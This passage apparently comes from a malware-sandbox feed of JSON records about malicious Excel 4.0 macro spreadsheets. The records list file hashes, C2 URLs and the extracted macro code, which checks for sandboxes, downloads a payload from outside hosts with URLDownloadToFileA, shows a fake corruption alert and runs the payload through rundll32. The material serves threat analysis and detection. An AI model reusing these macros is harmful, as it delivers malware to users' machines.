,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uCU8BmUgHt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21a1db0eb7f30cbc33f35ab8c8d8ea1fb28b6860c5f810bacedac2c7a9e4cf8e"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"21a1db0eb7f30cbc33f35ab8c8d8ea1fb28b6860c5f810bacedac2c7a9e4cf8e","filesize":209408,"md5":"0d1f9475ee646435ccf8ee9a6cffdefe","sha1":"f5c72cec19ef113b16bbf30fca6557d4851f5036","sha256":"21a1db0eb7f30cbc33f35ab8c8d8ea1fb28b6860c5f810bacedac2c7a9e4cf8e","sha512":"2629ba66f68711104bcdd9903e800a91f247fa2a4e28f483e551949f79f21b781d514c506d680cddf7af1c83e18597eb29563b3fabb8bb6fba6c388fa2399ea6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21a1db0eb7f30cbc33f35ab8c8d8ea1fb28b6860c5f810bacedac2c7a9e4cf8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mGH6lGxTqn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21a262d65fb4e3808b5dff7a612d0de858443318726f72975d7502215933baac"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"21a262d65fb4e3808b5dff7a612d0de858443318726f72975d7502215933baac","filesize":209920,"md5":"ddd41966554dff86e272f0b8d4fa81da","sha1":"ec581edb0b47a7c0d925c105e8e64d07291b6603","sha256":"21a262d65fb4e3808b5dff7a612d0de858443318726f72975d7502215933baac","sha512":"39b3851a783f0ee89c005e53921618289dabcf5ff68a5e1cd0a4e056d21224f8addac841722f7496901d830224ea302c5191db66851f0126c3b9a20fc4aa6675","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21a262d65fb4e3808b5dff7a612d0de858443318726f72975d7502215933baac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PDEUYTDzT6\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21adce23eacbf89a02e9c34d733bff1f2f2604e7a0890a9704888990457fbb33"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"21adce23eacbf89a02e9c34d733bff1f2f2604e7a0890a9704888990457fbb33","filesize":152576,"md5":"31f0ea60f1c2082c8697fa69461412c3","sha1":"6956a27a8c11db01cd1ae551d6bb3072048db809","sha256":"21adce23eacbf89a02e9c34d733bff1f2f2604e7a0890a9704888990457fbb33","sha512":"ff42dfc4da336466c11f5ccb1207c45301fec3049584f3a157543899cd1fda61ee6c031f055afa16fdf26325b85d02706de24dcf28cbefdf908f109cc8e2ea25","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21adce23eacbf89a02e9c34d733bff1f2f2604e7a0890a9704888990457fbb33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rexF3cNL22\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21c45548eae028f38c4d1d897a6a49eb7d29c02e5325f1694f48b53e1f70ca8b"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"21c45548eae028f38c4d1d897a6a49eb7d29c02e5325f1694f48b53e1f70ca8b","filesize":142848,"md5":"4999fadbc4f475bdfa6205e9a255903e","sha1":"69c719e60d5c5abcfd1c3ea6556a0e0347b1200c","sha256":"21c45548eae028f38c4d1d897a6a49eb7d29c02e5325f1694f48b53e1f70ca8b","sha512":"89d4918180f5bfa3a233295d8f8323355f4df54a8aa5bd67a2fe63ba37ec576198a96e1eb5d8588eb6c3ecfd69121e1c0a7755e4e4bcc9f747aecf540f5cbce2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21c45548eae028f38c4d1d897a6a49eb7d29c02e5325f1694f48b53e1f70ca8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TKWggIgW4V\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21e2b277079dcb686fe43afe708e5b6d1da00f0d1954d882ea7eccf1d38898de"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"21e2b277079dcb686fe43afe708e5b6d1da00f0d1954d882ea7eccf1d38898de","filesize":167936,"md5":"3c0beb56e5c59c52d6b3bf76701ea054","sha1":"951fe09ce83e87d2d251bdbe1ef4d05d26978f77","sha256":"21e2b277079dcb686fe43afe708e5b6d1da00f0d1954d882ea7eccf1d38898de","sha512":"724b064cea1240eb6b8c8bbf232e8af98aa1272752c0d76cc2c646a33f99b8ca40ff01ebf8f98bd67f9d9c5a59c2ff8b383aa1e6cf12a9cac122fb79664b8152","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21e2b277079dcb686fe43afe708e5b6d1da00f0d1954d882ea7eccf1d38898de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vdcBJaQ3FD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21ec58b3b27f2d72d1b688acbc2bd491f3f574c76fb9e6ea9327a994b3924f87"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"21ec58b3b27f2d72d1b688acbc2bd491f3f574c76fb9e6ea9327a994b3924f87","filesize":167936,"md5":"91449c711f6893f0b8f4ae625f24d47e","sha1":"7b1bcee9a5a00094e24d6de6de12946dd5abd72e","sha256":"21ec58b3b27f2d72d1b688acbc2bd491f3f574c76fb9e6ea9327a994b3924f87","sha512":"423744b124ecb95778ce1b438245184cc150d0db43995b674c986ffd4e7bf9959147c13274164c64da4f9f621237ea7989d3b4883c2c50bee4d1c2e23da8a163","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21ec58b3b27f2d72d1b688acbc2bd491f3f574c76fb9e6ea9327a994b3924f87.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"odXX0ezzum\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21fa953ee949fad50866ac27e7c2e0c7cef47e468c44850941d52595ac65f640"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"21fa953ee949fad50866ac27e7c2e0c7cef47e468c44850941d52595ac65f640","filesize":185344,"md5":"a760acf25dc19cc5bba227dce95da06a","sha1":"bd356dd263778f1af1557c9f102ef3198c9d7338","sha256":"21fa953ee949fad50866ac27e7c2e0c7cef47e468c44850941d52595ac65f640","sha512":"4c28818477418be3c376e8c3635172310ff7cb1ed9780df67540e355db8c46c97c6308fb1b0480c6ab3f89e20958b13e36456e0e036e686a9b06ccd60564d240","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21fa953ee949fad50866ac27e7c2e0c7cef47e468c44850941d52595ac65f640.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22097e9cd811a611fae344b02c2779a901bb7b15571e8c6771afb1f53d3c8524"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"22097e9cd811a611fae344b02c2779a901bb7b15571e8c6771afb1f53d3c8524","filesize":185344,"md5":"f61128b2629e9d192a546eaec1b907e8","sha1":"af3feed0677bb42fe1dfae37ce2089e2e0845380","sha256":"22097e9cd811a611fae344b02c2779a901bb7b15571e8c6771afb1f53d3c8524","sha512":"69b280a765272c05d77912c28d30a43d4e594606b7b30cd27390cc42d09cb47fc572946b877629716b7652dde4b9164689a1b5982871ac86d4fd338a3caaad90","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22097e9cd811a611fae344b02c2779a901bb7b15571e8c6771afb1f53d3c8524.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22346cf09a1e1ede5f538e8957cc9c8dc60a674aa00901af146c2fbd4ce44e92"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"22346cf09a1e1ede5f538e8957cc9c8dc60a674aa00901af146c2fbd4ce44e92","filesize":112640,"md5":"38b1fba93dc7c0f64a94fb3e8196e2b9","sha1":"9819e5fe33e32e830c4f9aaf9d42bd7aefec262d","sha256":"22346cf09a1e1ede5f538e8957cc9c8dc60a674aa00901af146c2fbd4ce44e92","sha512":"c42cbb76b2ac5659e85c3bf5f26dfed2e515423666bf6bbf44217ef31db060eaa849ffa3b685e4b1299b2e53ddd5a1a9454bcf4dc9d0c4045a33d5a1cd5af41d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22346cf09a1e1ede5f538e8957cc9c8dc60a674aa00901af146c2fbd4ce44e92.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22436df00e572bf888817dda29d2acc9f21e24301707b831ddaa002e65c89b98"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"22436df00e572bf888817dda29d2acc9f21e24301707b831ddaa002e65c89b98","filesize":209920,"md5":"fd7ff31c06380f91a4e8a1e9308dd939","sha1":"fb66f18cc1bbc1895d589eb81f2feda4a70f276e","sha256":"22436df00e572bf888817dda29d2acc9f21e24301707b831ddaa002e65c89b98","sha512":"7f0e69a7e5792a311ee9699c95ca605610491d4ebddc186b05e5ecdabf68673d094752a50adbd2e9e03bb32a2a0157930862df1458031bffbaa802b48cdc729c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22436df00e572bf888817dda29d2acc9f21e24301707b831ddaa002e65c89b98.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pnUZbqG1bI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2271a199c77ff8b75b15741f72c6f0ae1fdbcd7cfccffb2b7a8674036379eec1"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"2271a199c77ff8b75b15741f72c6f0ae1fdbcd7cfccffb2b7a8674036379eec1","filesize":167936,"md5":"ed3797cb896f54e8dda9d850f84febfc","sha1":"c7707e02cc75e98bd7a6ae4b04cb5b7bb955b956","sha256":"2271a199c77ff8b75b15741f72c6f0ae1fdbcd7cfccffb2b7a8674036379eec1","sha512":"60592e3490054b75300fa93aed79356223b55b6bbdeae0716a0c914bd6ae6faf9a4d49b2b3134b16fa0d56eabdc7e159c7ceeb46231f44a1f321d3a6c7eb8357","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2271a199c77ff8b75b15741f72c6f0ae1fdbcd7cfccffb2b7a8674036379eec1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AjiJbaMhEQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22835d38470c5e2ed8ab7b14506bcae2b50c5370a76d574cb2bc1f7a62b52cdb"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"22835d38470c5e2ed8ab7b14506bcae2b50c5370a76d574cb2bc1f7a62b52cdb","filesize":113664,"md5":"9e366f3fe9f8c71dff434b84daf564b9","sha1":"13ecaaa665f4084af5882ab12e8b51c6a753788f","sha256":"22835d38470c5e2ed8ab7b14506bcae2b50c5370a76d574cb2bc1f7a62b52cdb","sha512":"02dc859f042fadc04f64353557c35390b9a06d4b505686e80c50a5370f0b8a49a2451acff065b1b2d3bf19e47655a2213bed4e9902dd1720fcaf95e4217bc522","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22835d38470c5e2ed8ab7b14506bcae2b50c5370a76d574cb2bc1f7a62b52cdb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"leXYjjdgfI\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"228975a0c9e879cda0dee11743bfd6b18e369191bdf123132a5e8c8b0e9e3cc9"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"228975a0c9e879cda0dee11743bfd6b18e369191bdf123132a5e8c8b0e9e3cc9","filesize":209408,"md5":"ed5a136bda3eea6c79d174d3223534fc","sha1":"46f33399a704f6b444fe749da3f3742deb834b61","sha256":"228975a0c9e879cda0dee11743bfd6b18e369191bdf123132a5e8c8b0e9e3cc9","sha512":"4d9f2688908e6118b4b0f117782b0c4c73d95fa2e9099634d1862a26995fab17b11b37c2afe0f66e7ff34cc650031eef29b29ee2711341918a2b87180556ad0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"228975a0c9e879cda0dee11743bfd6b18e369191bdf123132a5e8c8b0e9e3cc9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oJSnsHQv0X\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"228d43258ff69129c1dfb1e2fda9d3d2d66e28c7f14f4c66e73c2c39d640170c"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"228d43258ff69129c1dfb1e2fda9d3d2d66e28c7f14f4c66e73c2c39d640170c","filesize":206336,"md5":"b1012a109ba0f036080b9d948b3bff46","sha1":"7868a8ad1f901fcc42c5601fcd8cc88b2021228a","sha256":"228d43258ff69129c1dfb1e2fda9d3d2d66e28c7f14f4c66e73c2c39d640170c","sha512":"77df4d5e7ec1dd2f904fb421bcf664a50650b1d0a00c2d3c51ac805f3495ba81ad569ee85f027818138b8fb380a51fc609b29361590a5d1fb1618afc73d56723","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"228d43258ff69129c1dfb1e2fda9d3d2d66e28c7f14f4c66e73c2c39d640170c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fe6UQDEPF2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22912410f3d5589892791207bc4d369f4b72d8e1a46870caa0073bb8d0455d78"},"analysis":{"reported":"2020-04-09T16:15:18Z","score":10},"files":[{"filename":"22912410f3d5589892791207bc4d369f4b72d8e1a46870caa0073bb8d0455d78","filesize":206336,"md5":"4dca6655f8ae024dd8b844c8a0df9322","sha1":"db7e7b44fd487f8da4f9c2c8621452593a4baca2","sha256":"22912410f3d5589892791207bc4d369f4b72d8e1a46870caa0073bb8d0455d78","sha512":"ea3ce993bc5a80071f2ef696e5ea2a01196849ea4f913f69d638a47ed91125d842a8837ff06985b649835b45d3473b00b05202115880269aaedc2aed27b5eb50","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22912410f3d5589892791207bc4d369f4b72d8e1a46870caa0073bb8d0455d78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"G4nRccjvaX\",TRUE)\nGOTO(R$0C$18)"}}}]}
